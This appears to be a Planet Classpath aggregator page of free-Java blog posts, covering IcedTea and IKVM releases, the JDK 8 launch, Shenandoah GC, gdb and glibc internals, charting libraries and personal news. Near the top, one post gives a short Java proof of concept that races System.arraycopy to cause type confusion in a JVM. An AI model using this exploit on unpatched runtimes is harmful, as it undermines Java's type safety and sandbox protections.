Planet Classpath

Jainja is a JVM (Java Virtual Machine) written in Java. Focus is set on portability, not on performances. Jainja supports Java 1.5 features.

This release adds support for Minix, Haiku and Dart.

So Jainja currently works on Linux, Windows, xBSD, Minix, Haiku, Java SE, Android, GWT, and Dart

More infos

 
I'm currently working on a new "platform" target for Jainja: Dart

I got some preliminary results but only simple applications are working at this stage.


Here is a simple PoC exploit for the issue fixed here:

class Union1 { }
class Union2 { }

class arraytoctou {
  static volatile Union1 u1 = new Union1();

  public static void main(String[] args) {
    final Union1[] arr1 = new Union1[1];
    final Union2[] arr2 = new Union2[1];
    new Thread() {
      public void run() {
        for(;;) {
          try {
            System.arraycopy(arr1, 0, arr2, 0, 1);
            if (arr2[0] != null) break;
          } catch (Exception _) { }
        }
      }
    }.start();

    while (arr2[0] == null) {
      arr1[0] = null;
      arr1[0] = u1;
    }

    System.out.println(arr2[0]);
  }
}

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative virtual machines and architectures beyond those supported by OpenJDK.

This release updates our OpenJDK 7 support in the 2.4.x series with the April 2014 security fixes.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below.

What’s New?

New in release 2.4.7 (2014-04-15)

The tarballs can be downloaded from:

We provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so.

The tarballs are accompanied by digital signatures available at:

These are produced using my public key. See details below.

SHA256 checksums:

  • 754350cbd704b22b7ba3d14c8283eb2d896d137824f95a9e6a2b34678658ade1 icedtea-2.4.7.tar.gz
  • 92a1ac08f3bdb1f0bca58a6528020ca0d7e7e720ad438743133de9d0b3bf875d icedtea-2.4.7.tar.gz.sig
  • b66973bef7808f8fb03be64e44d312ea2d13590a68a6a4e6690dbcdd1947459d icedtea-2.4.7.tar.xz
  • 6766d3fcd0e2b7c167bcb217e2a7c03b6582b84b5a246d71601b5d7863c60ba7 icedtea-2.4.7.tar.xz.sig

The checksums can be downloaded from:

A 2.4.7 ebuild for Gentoo is available, along with a 2.4.7 source RPM.

The following people helped with these releases:

We would also like to thank the bug reporters and testers!

To get started:

$ tar xzf icedtea-2.4.7.tar.gz

or:

$ tar x -I xz -f icedtea-2.4.7.tar.xz

then:

$ mkdir icedtea-build
$ cd icedtea-build
$ ../icedtea-2.4.7/configure
$ make

Full build requirements and instructions are available in the INSTALL file.

Happy hacking!

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative virtual machines and architectures beyond those supported by OpenJDK.

This release updates our OpenJDK 6 support in the 1.13.x series with the April 2014 security fixes.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below.

What’s New?

New in release 1.13.3 (2014-04-15)

The tarballs can be downloaded from:

We provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so.

The tarballs are accompanied by digital signatures available at:

These are produced using my public key. See details below.

SHA256 checksums:

  • 15a5a9b4ff52f67a3dffd264e75d6f984bc196f47899376c206b1e51000fd072 icedtea6-1.13.3.tar.gz
  • 00e7f7083fa907b9a39dfbae1a5461afe741d0cbf80456c8dbcefa37fa8f14da icedtea6-1.13.3.tar.gz.sig
  • 0149ffffcfb55739357a2c720421cbc311e4ccb248c0c185ed67671d2c45f748 icedtea6-1.13.3.tar.xz
  • a36f43665bfcfe0e03ae08507a7db7a09892f14cc9defe345ad344134cc3c17c icedtea6-1.13.3.tar.xz.sig

The checksums can be downloaded from:

A 1.13.3 ebuild for Gentoo is available.

The following people helped with these releases:

We would also like to thank the bug reporters and testers!

To get started:

$ tar xzf icedtea6-1.13.3.tar.gz

or:

$ tar x -I xz -f icedtea6-1.13.3.tar.xz

then:

$ mkdir icedtea-build
$ cd icedtea-build
$ ../icedtea6-1.13.3/configure
$ make

Full build requirements and instructions are available in the INSTALL file.

Happy hacking!

Lots of new stuff in OresmeKit, the graphing toolkit for GNUstep and Mac! As an Example, an advanced dashboard based on DataBasin that displays the system load of Salesforce.com. It is not generally available yet, but I hope it will be!

Grid-sizing is now selectable so it gets spaced in 1K or 1M intervals (depending on the data-range available), like it is used in both screenshots in this example.

 - (void)setYAxisGridSizing:(OKGridSizing)sizing;

Can take now: OKGridConstantSize, OKGridKiloMega

Also, one can decide to draw Just the label of the minimum and maximum value or a label for every grid:

- (void)setYAxisLabelStyle:(OKLabelStyle)style;

Can take:  OKNoLabels, OKMinMaxLabels, OKAllLabels

1000-unit Grid



To complement this kind of visualization, a new kind of Label formatting can be used. In the example above, the numbers are plain, 10.000 is written as such, in the example below, it is formatted as 10K, if we were using 10.000.000, it would me 10M

1000 - grid with K formatting

I'll be joining my colleagues in the Oracle office in Hamburg to chat about development and other roles within a large IT company as part of the Girls' Day in Germany.

Fiorenza Sofia :)

On 19th of March the most wonderful and happiest event in my life happened, my daughter was born :) at 17:16, in Karlsruhe.

Just in time for Fathers’ day, which happens exactly on 19th of March in Italy (not in Germany, so I can celebrate twice ;)

Everybody said that being a father is a life changing event. While I started to understand it already from those past 9 months, I don’t think I really got prepared to fully appreciate what it really means. In fact, Roman told me that you have 9 months to prepare and inevitably get unprepared to this appointment!

Indeed, and it is really beyond description, but I feel so proud and happy, and scared, all the feelings are mixed up… but above all, I feel full of love, it is so wonderful to look at her smiling (and she does smile a lot!), a warm sense of calm and peace and happiness goes all around, the air is pregnated with it! Everyone should experience this feeling at least once, the World would be so much a better place, I think.

Anyway, it’s time to go and look at her now, she grows so fast and I don’t want to miss not even a minute of her life!


Oracle today announced the availability of JDK 8, a production-ready implementation of the Java SE 8 Platform Specification, which was recently approved through the Java Community Process (JCP). This release includes the largest upgrade to the Java programming model since the platform was introduced in 1996. JDK 8 was developed collaboratively in the OpenJDK Community.


The Java SE 8 release is the result of industry-wide development involving open review, weekly builds and extensive collaboration between Oracle engineers and members of the worldwide Java developer community via the OpenJDK Community and the JCP.


"The release of Java SE 8 demonstrates the innovation driven by the ongoing collaboration between IBM, Oracle and other members of the Java community in OpenJDK," said John Duimovich, Distinguished Engineer, IBM. "Java SE 8 provides enterprise customers with significant gains in productivity, scalability and maintainability, and further demonstrates that they can continue to rely on Java to grow their business."


Taken from an Oracle press release titled Oracle Announces Java 8.

That brings the total count up to 18 press releases from Oracle mentioning OpenJDK.

The first release candidate is available. It can be downloaded here or from NuGet.

What's New (relative to IKVM.NET 7.3):

  • Merged OpenJDK 7u40 b34.
  • Many bug fixes.
  • Optimizations to reduce metadata size.
  • Added support for getting package information from the right jar manifest for ikvmc compiled jars.
  • Improved runtime support for running on platforms without Reflection.Emit.
  • Removed IKVM.Attributes.HideFromReflectionAttribute.
  • IKVM.Reflection: Many improvements and fixes.
  • IKVM.Reflection: WinMD projection support.

Changes since previous development snapshot:

  • IKVM.Reflection: Fix for Type.GetInterfaceMap() issue.

Binaries available here: ikvmbin-7.4.5196.0.zip

Sources: ikvmsrc-7.4.5196.0.zip, openjdk-7u40-b34-stripped.zip

Two years, seven months, and eighteen days after the release of JDK 7, production-ready builds of JDK 8 are now available for download!

Thanks! A major new release of a software system as large as the JDK is the direct work of many hundreds of developers, with indirect contributions from thousands more. By way of thanks I’d like to mention the major contributors here specifically:

Many smaller—but no less important—contributions were made via the JEP Process and in other ways by many other developers, including (but not limited to!) the following: Niclas Adlertz, Lance Andersen, Sundar Athijegannathan, Jaroslav Bachorik, Joel Borggrén-Franck, Andrew Brygin, Brian Burkhalter, Rickard Bäckman, Sergey Bylokhov, Suchen Chien, Brent Christian, Iris Clark, Sean Coffey, John Coomes, John Cuthbertson, Joe Darcy, Dan Daugherty, Mike Duigou, Xue-Lei Fan, Michael Fang, Robert Field, Daniel Fuchs, Mikael Gerdin, Jennifer Godinez, Zhengyu Gu, Kurchi Hazra, Chris Hegarty, Erik Helin, David Holmes, Vladimir Ivanov, Henry Jen, Yuka Kamiya, Karen Kinnear, Vladimir Kozlov, Marcus Lagergren, Jan Lahoda, Staffan Larsen, Doug Lea, Sergey Malenkov, Stuart Marks, Eric McCorkle, Keith McGuigan, Rob McKenna, Michael McMahon, Morris Meyer, Sean Mullan, Alejandro Murillo, Kelly O’Hair, Frederic Parain, Bhavesh Patel, Petr Pchelko, Oleg Pekhovskiy, Valerie Peng, Anthony Petrov, Pavel Porvatov, Tony Printezis, Joe Provino, Yumin Qi, Phil Race, Tom Rodriguez, Leonid Romanov, Vicente Romero, John Rose, Bengt Rutisson, Vinnie Ryan, Abhijit Saha, Dmitry Samersoff, Paul Sandoz, Naoto Sato, Thomas Schatzl, Alexander Scherbatiy, Harold Seigel, Konstantin Shefov, Xueming Shen, Serguei Spitsyn, Kumar Srinivasan, Lana Steuck, Attila Szegedi, Christian Thalinger, Igor Veresov, Hannes Wallnöfer, Joe Wang, Max Wang, Roland Westrelin, Brad Wetmore, Jesper Wilhelmsson, Hinkmond Wong, Dan Xu, Jiangli Zhou, and Alexander Zuev.

More than code Contributions of reviews, tests, and test results are just as important as contributions of code. Oracle’s internal quality and performance teams did their usual thorough job, and feedback from the wider Java community was equally valuable.

Over 400 of the more than 8,000 bug and enhancement issues addressed in JDK 8 were reported externally. These reports came in throughout the release cycle, enabled by our regular posting of weekly builds, but naturally the rate increased after we posted the Developer Preview build in September. The following early testers who submitted significant bug reports deserve special mention:

Valuable reports continued to come in after we posted the first Release Candidate build in early February. Of the small number of bugs fixed after that build, two were reported externally: A serious signature bug in the lambdafication of the Comparator API, and a nasty correctness bug in the implementation of default methods.

Launch! I’ll host the official Java 8 Launch Webcast at 17:00 UTC next Tuesday, 25 March. Join me for an open question-and-answer session with panel of key Java 8 architects, and to hear from a number of other special guests, by signing up here.

I just released a new version of Orson Charts, a 3D chart library for the Java platform. Version 1.2 contains significant new features driven by customer requirements:
  • logarithmic axis support;
  • value and range markers for all numerical axes (to match a similar feature in JFreeChart);
  • localisation support (with German and Italian localisations initially);
  • improved axis labelling with new tick label orientation options plus "stepped" labelling for category axes;
  • chart theme support, with some built-in themes plus the ability to create your own;
  • a JPEG export option (to add to the existing PNG, PDF and SVG export options).

In this release, we've also made efficiency improvements in the rendering engine and fixed a number of bugs that have been identified by clients and through our own testing (the recent exercise of creating the Orson Charts for HTML5 port uncovered a few issues, for example).

I can't have a blog post without a few screenshots so first up here is an example of the logarithmic axis (on the y-axis here, but it is possible to use a log scale on any numerical axis):

ScatterPlot3DDemo2_2.png

Next up, an example showing the highlighting that can be done with the new marker feature (see that the categories "Apple" and "Q4/12" have been highlighted, plus the bar is rendered in red to draw attention to that particular data value...Apple makes a *lot* of money, but you already knew that):

CategoryMarkerDemo1.png

Finally, some range markers on an XYZ plot to highlight particular ranges of values (and a custom color source to highlight those items that fall within the intersection of the three ranges). The most typical usage would be to show a range of y-values in some target range, but for demo purposes the example below adds a range marker to each axis:

RangeMarkerDemo1.png

Our focus for the next release is to continue improving the interactivity of the charts. While we are working on that, please go and download the free evaluation of Orson Charts 1.2 and send us your feedback.

Today I released version 1.5 of Orson PDF, a fast and small PDF generator for Java (it implements the Graphics2D API). I created this library last year because I wanted to provide export to PDF for both JFreeChart and Orson Charts, but without taking on a big external dependency:

popup_pdf.png

The Orson PDF jar file weighs in at less than 70kB (without using Pack200 or any other minimisation techniques). It doesn't support font embedding, but the latest release provides an option (enabled via rendering hints) to render text as vector graphics, which works pretty well when the amount of text is limited as is usually the case with charts.

If you are working with Java2D, you should also check out JFreeSVG, I released a new version of that library last week. It does SVG generation via the Graphics2D API and is, like Orson PDF, very light-weight (around 48k for the jar file).

Tomorrow marks 2 years I’m at Red Hat, and it has been so far a very exciting journey, for one of the most interesting and awesome company around. I’m glad I’m here!

Only problem is that I started on 29th of February, and tomorrow is actually 1sth of March… so I need to wait two years more before I can celebrate even the first year… ouch ;) But at least I’ll be able to do a very awesome party by  then!


I have an ol' OmniBook 800CT. A small, interesting computer, for its time, extremely advanced!
Small form factor, but still a very nice keyboard, something unmatched on modern netbooks. The unique pop-out mouse. The series started out with 386 processor, b&w display and ROM expansions.
The 800CT is one of the latest models: same form factor, SCSI connector, but color screen (800x600) and a hefty Pentium 133Mhz!
But only 32 MB of ram (the kernel report 31 of real mem, 24 avail mem)

Original 5.4 kernel: 9.2M
Custom kernel: 5.0 M

This shrinkage is quite hefty! almost 50%! More than raw disk usage, this new kernel boots faster and leaves  more free memory. Enough more that X11 is now almost usable

How can this be achieved? essentially by removing unused kernel options. If you remove drivers which you know you don't need because you don't have the hardware (and won't use it, e.g. you know you won't plug-in a certain card in the future) then you configure it out, it won't be built and it won't get in your kernel.
On an old laptop with no expansion except the ports and the PCMCIA port it has, this is relatively easy.

To build your custom kernel, follow the OpenBSD FAQ.

The main theory is to take the kernel configuration file, skim over it line by line it and see if you have the hardware, which you know by checking your dmesg. Dmesg shows which devices and drivers were loaded.Remember that you do not modify GENERIC, but a copy of it.

You can automate this with a tool called dmassage: it will parse your GENERIC configuration and produce an optimal tuned version, however it will not work out of the box.
Why? there are drivers which do not compile if other drivers are not present.

I'm unsure if this is really a bug, in my opinion it is at least "unclean" code, however since mostly this kind of extreme driver-picking is not done, it is not fatal and probably won't be fixed.

 If you remove all drivers at once, you won't easily find out one which one breaks, so my suggestion is to remove them in sets. One by-one is surely too tedious, since for each you need to make a build.
  1. remove X drivers
  2. build, if it works, copy the configuration file as a backup
  3. test the kernel, optionally, by booting it
  4. continue removal

Thus, in case of breakage, you can narrow it down to a less options.

If your mahcine doesn't have a certain bus, you may remove all drievrs attached to each. But proceed from the leaves, not the trunk: gradually remove the peripheral drivers before removing the bus support.

In my case, I found that an unremovable driver is:
et*    at pci?                # Agere/LSI ET1310


Remember that you are running an unsupported kernel, if you want support for a problem, better try it with the original kernel, of which you should anyway for safety retain a backup copy during the iterative building process.

The JogAmp community held a Ji Gong freedom talk that reminded people to exercise the 4 freedoms granted by the free software licenses in front of the free java developer room audience. The talk also proposed and showcased technical enhancements for High Availability JVM Technology on All Platforms.
Slides from the Ji Gong talk can be obtained at: https://jogamp.org/doc/fosdem2014/

During the same week JogAmp released version 2.1.4 of its high performance java opengl audio & media processing librarys.
This release includes some new highlights:
* Android OpenCL test apk’s. This enable you to compile and test an OpenCL JOCL application on desktop and then deploy on Android without using any OpenCL SDK for the phone, the JOCL binding will locate and bind the OpenCL drivers at runtime.
* Enable use of custom mouse pointers and window icons using the NEWT window and input toolkit.
* Multi window support on the Raspberry Pi including mouse-pointer use directly from console!
Complete list of bugs resolved for this 2.1.4 release can be found at:
https://jogamp.org/wiki/index.php/SW_Tracking_Report_Objectives_for_the_release_2.1.4

JiGong-Panorama-extracted-from-video Panorama-of-JiGong-JogAmp-talk-audience-at-FOSDEM-2014-Free-Java-Devroom 14020010 14020025 14020026 14020034 14020069 JamVM-OpenJDK8-FOSDEM-2014-panorama 14020032 14020027

Last weekend I’ve been talking about the Shenandoah GC at FOSDEM 2014. I announced the availability of the Shenandoah source code and project pages. Until Shenandoah becomes a proper OpenJDK project, it will be hosted on IcedTea servers. We currently have:

We also filed a JEP for Shenandoah, here you can find the announcement and discussion on hotspot-gc-dev.

If you are interested in the slides that I prsented at FOSDEM, you can find them here.

Implementation-wise we’re making good progress. Concurrent evacuation is working well and support for the C1 compiler is almost done.


Monument to Mozillians

Last week in Mozilla’s San Francisco office, members of the DOM, WebAPI, Accessibility, Networking, JS, Security, Add-Ons, and Apps teams gathered for discussions, hacking, and some good old face time.

Productive sessions were held on many topics. I’ve highlighted a few here:

Documentation

Web Workers

Service Workers

(Incremental) Cycle Collection ((I)CC)

Do Not Track (DNT)

  • Monica led a discussion of how to make DNT more effective

Content Security Policy (CSP)

  • Discussed applying CSP to chrome resources
  • Decided on a direction not requiring reinvention of the system principal that creates a new context data structure that includes a principal and other stuff like CSP per document.

Referrer handling and ping

  • Reached consensus that we should help with site efficiency by providing mechanism to strip referrer data on client side (to avoid additional RTT and redirect on the server)
  • Faster and more private for all
  • We will follow up with potentially reducing the amount of referrer data sent by default in gecko.

Sandboxing and e10s (electrolysis)

  • We (mostly billm) presented the state of e10s and sandboxing on desktop and b2g, including instructions on how to test your things with e10s/sandbox enabled
  • General Q&A about the project architecture and current sticking points

Accessibility

  • Shared plan for e10s and accessibility
  • Lots of face-to-face hacking
  • Standards work

IPDL and PBackground

  • bent gave an overview of IPDL and PBackground in particular
  • we have video here and will clean it up for public consumption some time soon

Improving DOM performance

  • many options for improving DOM performance were discussed
  • the biggest thing needed is test cases
  • lots of action items from this session are in the raw etherpad notes (at bottom)

Apps and Marketplace requests

  • Harald and Vishy joined us to bring up some concerns and questions that have been voiced by the marketplace team and various partners

Networking (necko)

  • The networking team held 3 sessions: one to discuss improvements to the necko APIs (better off-main thread support, providing a wrapper library with security checks built in, and upgrading to async file I/O were mentioned); one on ways that layout could better set network channel priority for faster loading of visible resources; and one to map out the API needed to support Service Workers. We also made a lot of progress designing off-main websockets and support.

Web Components

  • dglazkov from Google came by and participated in some good discussions about Web Components

Julien Wajsberg represented the Gaia team’s needs with a discussion of Haida, the upcoming Firefox OS UX

Raw notes from the week with lots of links are available here: https://etherpad.mozilla.org/JSTJanWorkWeek

Occasionally I see questions about how to import gdb from the ordinary Python interpreter.  This turns out to be surprisingly easy to implement.

First, a detour into PIE and symbol visibility.

“PIE” stands for “Position Independent Executable”.  It uses essentially the same approach as a shared library, except it can be applied to the executable.  You can easily build a PIE by compiling the objects with the -fPIE flag, and then linking the resulting executable with -pie.  Normally PIEs are used as a security feature, but in our case we’re going to compile gdb this way so we can have Python dlopen it, following the usual Python approach: we install it as _gdb.so and add a a module initialization function, init_gdb. (We actually name the module “_gdb“, because that is what the gdb C code creates; the “gdb” module itself is already plain Python that happens to “import _gdb“.)

Why install the PIE rather than make a true shared library?  It is just more convenient — it doesn’t require a lot of configure and Makefile hacking, and it doesn’t slow down the build by forcing us to link gdb against a new library.

Next, what about all those functions in gdb?  There are thousands of them… won’t they possibly cause conflicts at dlopen time?  Why yes… but that’s why we have symbol visibility.  Symbol visibility is an ELF feature that lets us hide all of gdb’s symbols from any dlopen caller.  In fact, I found out during this process that you can even hide main, as ld.so seems to ignore visibility bits for this function.

Making this work is as simple as adding -fvisibility=hidden to our CFLAGS, and then marking our Python module initialization function with __attribute__((visibility("default"))).  Two notes here.  First, it’s odd that “default” means “public”; just one of those mysterious details.  Second, Python’s PyMODINIT_FUNC macro ought to do this already, but it doesn’t; there’s a Python bug.

Those are the low-level mechanics.  At this point gdb is a library, albeit an unusual one that has a single entry point.  After this I needed a few tweaks to gdb’s startup process in order to make it work smoothly.  This too was no big deal.  Now I can write scripts from Python to do gdb things:

#!/usr/bin/python
import gdb
gdb.execute('file ./install/bin/gdb')
print 'sizeof = %d' % gdb.lookup_type('struct minimal_symbol').sizeof

Then:

$ python zz.py
72

Soon I’ll polish all the patches and submit this upstream.

Earlier in 2013 on a bit of a whim I bought a Raspberry Pi. I can’t remember if I had a good use case for it but in the end I decided to use it as an XBMC frontend. I put raspbmc on it and setup was incredibly easy (my media files are on my Synology 413j NAS).

I wanted to mount it to the back of my small TV so George Wright found me a thingiverse Raspberry Pi case with VESA mounting holes. I used the MakerBot that Toronto Mozillians pitched in and bought. The results are pretty nice:

Case hot off the printer

Freshly-printed case

Case mounted on the back of my TV

Case mounted on the back of my TV

Case mounted on the back of my TV with cover

Case mounted on the back of my TV with cover

JNode, the free operating system developed in Java, has now its twitter account. Follow #JNode !

GitHub is now the main repository for JNode sources : https://github.com/jnode

. We are now using GitHub’s issue tracker.

The annotation processing API, both the processor-specific portion of the API in javax.annotation.processing and the language modeling portions in javax.lang.model.*, are being updated to support the new language features in Java SE 8. Procedurally, the proposed changes are covered by the second maintenance review of JSR 269: Maintenance Draft Review 2.

As summarized on on the maintenance review page, there are three categories of changes from the version of the API shipped with Java SE 7:

  1. Cleaning up the existing specification without changing its semantics (adding missing javadoc tags, etc.)
  2. API changes to support the language changes being made in Project Lambda /JSR 335. These includes adding javax.lang.model.type.IntersectionType as well as javax.lang.model.element.ExecutableElement.isDefault.
  3. API changes to support the language changes being made under JSR 308, Annotations on Java Types. These include javax.lang.model.AnnotatedConstruct and updating javax.annotation.processing.Processor.

The small repeating annotations language change, discussed on an OpenJDK alias, is also supported by the proposed changes.

A detailed specification difference is available. Please post any comments here or send them to me through email.

Late last night, fuelled by energy drinks for the first time since university, after a frantic hacking session to put out some fires discovered at the last minute, I prepared my first ever 1.0.0 release.  I wanted to share some retrospective thoughts about this.

It's worth mentioning that the project uses a slightly modified implementation of Semantic Versioning.  So 1.0.0 is a significant release: it indicates that the project is no longer in a beta status, rather it's considered stable, mature even.  Any public API the project provides is considered frozen for the duration of 1.X.X release train.  Any mistakes we have made (and I fully expect we'll discover plenty of them) in terms of interface design, we are stuck with for a while.  This part is a little bit frightening.

Oh, I should specify that the project is Thermostat, an open source Java monitoring tool.  Here's the release announcement from our announcement list archives.  My last post (woah, have I not posted anything since February?  Bad code monkey!!) also mentioned it.

Thermostat consists of a core platform including a plugin API, and ships with several useful plugins.  Leading up to this release, our focus has been primarily on the core platform and API.  Releasing 1.0.0 is somewhat exciting for us as we can move into primarily maintenance mode on the core, while building out new features as plugins.  Writing brand new code instead of lots of tweaking and refactoring of existing code?  Yes, please!

But what I really want to write about isn't the project itself, but the process and the things I learned along the way.  So, in no particular order:

Estimation is hard

This project was started by two engineers about two and a half years ago.  There was an early throwaway prototype, then a new prototype, which eventually became today's code base but looks nothing like it.  Over time things started to look more and more reasonable, and we started thinking about when we'd be releasing a 1.0 version.  I want to say that probably for more than a year, we've been saying "1.0 is around the corner".  And each time we said it, we believed it.  But we were, until recently, obviously wrong.  Now there are various reasons for this, some better than others.  In that time, there were new requirements identified that we decided we couldn't release 1.0 without implementing.  Naturally, estimates must be revised when new information appears.  But a lot of it is simply believing that some things would take significantly shorter than it actually did.  I want to think that this is something that improves with experience, and will be mindful of this as we move into building out new features and/or when I'm one day working on a new project.

Early code and ideas will change

When I think back to the early days of this project, before it even had a name, it's hard to imagine.  This is because it is so incredibly different from where we ended up.  Some parts of our design were pretty much turned inside out and backwards.  Entire subsystems have been rewritten multiple times.  We've used and abandoned multiple build systems.  And this trend doesn't seem to be slowing down; we've had ideas brewing for months about changes targeting the 2.X release train that will change the picture of Thermostat in significant ways again.  One really awesome result of this is that nobody working on the project can afford to indulge their ego; any code is a rewrite candidate if there is a good reason for it, no matter who wrote it originally or how elegantly.  And everyone understands this.  Nobody gets attached to one implementation, one design.  It's nice to be working in a meritocratic environment.  It's a sort of freedom: freedom from attachments, and freedom to innovate.

Good test coverage helps make changes safe

So this one is something that's probably been noted by a lot of developers.  I know I've been taught this in school, read it in various places, and so forth.  But it is working on Thermostat that has really driven it home for me.  In the early days, we didn't really have any tests.  It made sense at the time; we didn't really know where we were going, the code base was small and undergoing radical changes very regularly.  But time went on, and it became clear that this project was going to be around for a while, and both the code base and the group of contributors were growing.  So, we started adding tests.  Lots and lots of tests.  No new code was accepted without tests, and over time we filled in gaps in coverage for pre-existing code.  The happy result has been an ability to make very invasive changes with the confidence that side effects will be minimal, and likely detected at test time.  I cannot exaggerate the number of times I've been thankful we put in the effort to get our unit and integration tests to this level.

Automation is king

Have a repetitive, error-prone task?  Script that.  Over time Thermostat has grown a collection of useful little helper scripts that save contributors time and effort, over and over again.  From firing up typical debug deployments, to release management tasks, to finding source files with missing license headers; we write this stuff once and use it forever.  These type of things go into version control of course, so that all developers can benefit from them.  Also, testing automation.  The common term used is of course Continuous Integration Testing, and for ages we've been using a Jenkins instance to run tests in sort of a clean room environment, catching problems that may have been hidden by something in a developer's environment.  This has saved us a lot of pain, letting us know about issues within hours of a commit, rather than discovering them by accident days, weeks, or months later and having to wonder what caused the regression.  I'll have to insist on a similar set up for any non-trivial project I work on.

That's all I have to say.  Hopefully it won't be so long before my next post.  I've actually been meaning to make a "battle station" write-up; I'm a remote employee, and invested time and money in a convertible standing desk setup and some clever mounting techniques to keep my workspace neat despite the number of devices involved.  Until then, Adieu!

If you’re debugging an application that loads thousands of shared libraries then be sure to read the LinkerInterface page on the GDB wiki.

I didn’t write about Shenandoah in a while. We first needed to clear up some issues around it, which is done now. The project is not dead yet, quite the contrary, we’re working feverishly. Just now, we are about concurrent evacuation to work :-)

Last time I wrote about concurrent marking. Before I carry on, I want to introduce a new concept: Brooks pointers. The idea is that each object on the heap has one additional reference field. This field either points to the object itself, or, as soon as the object gets copied to a new location, to that new location. This will enable us to evacuate objects concurrently with mutator threads (how exactly this is done is a topic for a separate post).

One problem of course is that as soon as we have two copies of an object (one in from-space, one in to-space), we need to be careful to maintain consistency. This means that any changes to objects must happen in the to-space copy. This is achieved by putting barriers in various places (everything that writes to objects, or runtime code that uses objects) that resolve the object before writing into it or using it. If we don’t do that, we might end up with some threads using the old copy, and some threads using the new copy, which is, obviously, a problem. The barrier simply reads the brooks pointer field and returns the forwarded object to any code that uses it. In terms of machine code instructions, this means one additional read instruction for each write operation into the heap (and some read operations by the runtime). Infact, we currently need two instructions, the reason for which I’ll explain later.

Eventually, when evacuation is done, we need to somehow update all references to objects to point to the to-space locations. We do that by piggy-backing on the concurrent marking phase. When we traverse the heap for marking, we see all live objects and references, and whenever we visit an object, we update all its object references to point to the new locations of the referents.

There’s two tradeoffs with using brooks pointers: we need more heap space (ideally, one word per object), and we need more instructions to read and write objects.

Next time, I’ll start explaining how concurrent evacuation works.

Because there have been many requests: yes, Shenandoah will be open source. Our plan is to propose a JEP as soon as we can, and make it an OpenJDK project if possible.


I started experimenting with Emacs’s SVG capabilities and ended up writing a game. Presenting:

Emacs Slime Volleyball!

It’s a clone of the great Slime Volleyball applet I used for IcedTeaPlugin testing.

Try it out!

Emacs Slime Volleyball Screenshot -- Gameplay
Emacs Slime Volleyball Screenshot -- Scoring a Point

The JDK 8 Developer Preview (a.k.a. Milestone 8) builds are now available!

This milestone is intended for broad testing by developers. We’ve run all tests on all Oracle-supported platforms and haven’t found any glaring issues. We’ve also fixed many of the bugs discovered since we reached the Feature Complete milestone back in June.

The principal feature of this release is Project Lambda (JSR 335), which aims to make it easier to write code for multicore processors. It adds lambda expressions, default methods, and method references to the Java programming language, and extends the libraries to support parallelizable operations upon streamed data.

There are, of course, many other new features, including a new Date and Time API (JSR 310), Compact Profiles, the Nashorn JavaScript Engine, and even some anti-features such as the removal of the Permanent Generation from the HotSpot virtual machine. A complete list of new features is available on the JDK 8 Features page.

If you’ve been watching JDK 8 evolve from afar then now is an excellent time to download a build and try it out—the sooner the better! Let us know if your existing code doesn’t compile and run correctly on JDK 8, if it runs slower than before, if it crashes the JVM, or if there are any remaining design issues in the new language and API features.

We’ll do our best to read, evaluate, and act on all feedback received via the usual bug-reporting channel between now and the end of October. After that we’ll gradually ramp down the rate of change in order to stabilize the code, so bugs reported later on might not get fixed in time for the GA release.

I’ve been trying to figure out how to get information about libraries loaded with dlmopen out of glibc‘s runtime linker and into GDB.

The current interface uses a structure called r_debug that’s defined in link.h. If the executable’s dynamic section has a DT_DEBUG element, the runtime linker sets that element’s value to the address where this structure can be found. I tried to discover where this interface originated, but I didn’t get very far. The only mention of it I found anywhere in any standard is in the System V Application Binary Interface, where it says:

If an object file participates in dynamic linking, its program header table will have an element of type PT_DYNAMIC. This “segment” contains the .dynamic section. A special symbol, _DYNAMIC, labels the section…

and later:

DT_DEBUG
This member is used for debugging. Its contents are not specified for the ABI; programs that access this entry are not ABI-conforming.

No help there then. In glibc, r_debug looks like this:

struct r_debug
{
  int r_version;              /* Version number for this protocol.  */

  struct link_map *r_map;     /* Head of the chain of loaded objects.  */

  /* This is the address of a function internal to the run-time linker,
     that will always be called when the linker begins to map in a
     library or unmap it, and again when the mapping change is complete.
     The debugger can set a breakpoint at this address if it wants to
     notice shared object mapping changes.  */
  ElfW(Addr) r_brk;
  enum
    {
      /* This state value describes the mapping change taking place when
         the `r_brk' address is called.  */
      RT_CONSISTENT,          /* Mapping change is complete.  */
      RT_ADD,                 /* Beginning to add a new object.  */
      RT_DELETE               /* Beginning to remove an object mapping.  */
    } r_state;

  ElfW(Addr) r_ldbase;        /* Base address the linker is loaded at.  */
};

With glibc, r_version == 1. At least some versions of Solaris have r_version == 2, and when this is the case there are three extra fields, r_ldsomap, r_rdevent, r_flags. GDB uses r_ldsomap if r_version == 2; the other two seem to be the interface with librtld_db. That’s not documented anywhere to my knowledge, and may not even be fixed: applications are supposed to use the external interface to librtld_db as documented here.

Here is the problem: r_debug, as it stands, has no way to access more than one namespace. The objects in r_map are the default namespace, directly linked, or opened with dlopen, or opened with dlmopen with lmid set to LM_ID_BASE. The r_ldsomap field in Solaris’s r_debug gives access to the linker’s namespace, opened with dlmopen with lmid set to LM_ID_LDSO, but you still can’t see any other namespaces.

glibc uses multiple r_debug structures internally, one per namespace. It would be trivial to add a “next r_debug” link to r_debug if it were possible to extend the structure, but to do this you’d need to set r_version > 2. Applications could arguably expect a runtime linker with r_version > 2 to support the version 2 interface in full, but it wouldn’t be possible to do that in glibc without reverse engineering Solaris’s implementation. glibc is therefore stuck at r_version == 1, and the r_debug structure is effectively immutable for all time.

Since earlier today the CACAO Doxygen Manual is online: http://c1.complang.tuwien.ac.at:8010/doxygen/

The manual is intended for CACAO developers and everyone who is interested in CACAO internals. Most comments are not yet Doxygen ready but things are improving with every commit. In the end publishing this manual should also have the side-effect of making developers aware and care about Doxygen documentation ;).

The pages are regenerated nightly by our Buildbot using the latest sources from the staging repository.